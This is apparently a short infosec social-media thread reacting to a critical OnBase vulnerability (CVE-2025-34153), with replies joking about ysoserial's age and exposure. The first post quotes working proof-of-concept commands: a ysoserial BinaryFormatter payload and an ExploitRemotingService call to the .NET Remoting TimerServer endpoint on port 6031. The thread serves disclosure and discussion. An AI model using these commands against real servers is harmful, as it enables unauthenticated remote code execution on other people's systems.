cR0wHoly fucking shit this perfect 10 in Hyland Software OnBase. 🥳
https://gist.github.com/VAMorales/32794cccc2195a935623a12ef32760dcsev:CRIT 10.0 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
https://www.cve.org/CVERecord?id=CVE-2025-34153
cR0wOkay, that was kind of a big reaction. But:
Using ysoserial.exe, the BinaryFormatter deserialization payload is generated with the gadget TypeConfuseDelegate to trigger Remote Code Execution on the server. As a proof of concept, the command provided will have the remote server execute the “whoami” command locally and store the command output of the account currently running the service into the file located at “C:\temp\whoami.txt”.ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'whoami > c:\temp\whoami.txt' -o base64Using ExploitRemotingService.exe, the generated base64 encoded payload from ysoserial.exe is passed as an argument and sent as a raw deserialization payload to the .NET Remoting TCP Channel on port 6031 with the known URI endpoint TimerServer that was registered inside Hyland.Core.Timers.dll.ExploitRemotingService.exe tcp://<onbase-server>:6031/TimerServer raw <ysoserial-payload>
Kallisti@cR0w@infosec.exchange
ysoserial? Makes me nostalgic.
How old is it now? Like a decade?
Rob O :verified:@cR0w@infosec.exchange Nah, I'm sure this is fine and not a big deal. I don't know anyone who uses OnBase at all.
checks email for service downtime notifications